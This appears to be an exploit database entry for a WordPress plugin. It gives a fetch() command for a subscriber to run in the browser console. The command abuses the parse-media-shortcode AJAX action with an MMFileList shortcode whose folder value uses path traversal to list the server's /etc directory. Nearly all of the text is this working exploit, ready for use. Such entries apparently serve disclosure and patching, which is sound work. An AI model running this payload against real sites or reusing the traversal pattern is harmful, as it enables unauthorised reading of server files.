## https://sploitus.com/exploit?id=WPEX-ID:9FF85B06-819C-459E-90A9-6151BFD70978
Run the below command in the developer console of the web browser while being on the blog as a subscriber user
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=parse-media-shortcode&shortcode=[MMFileList folder="../../../../../../../../../../etc" format="table" types"" headings=""]',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));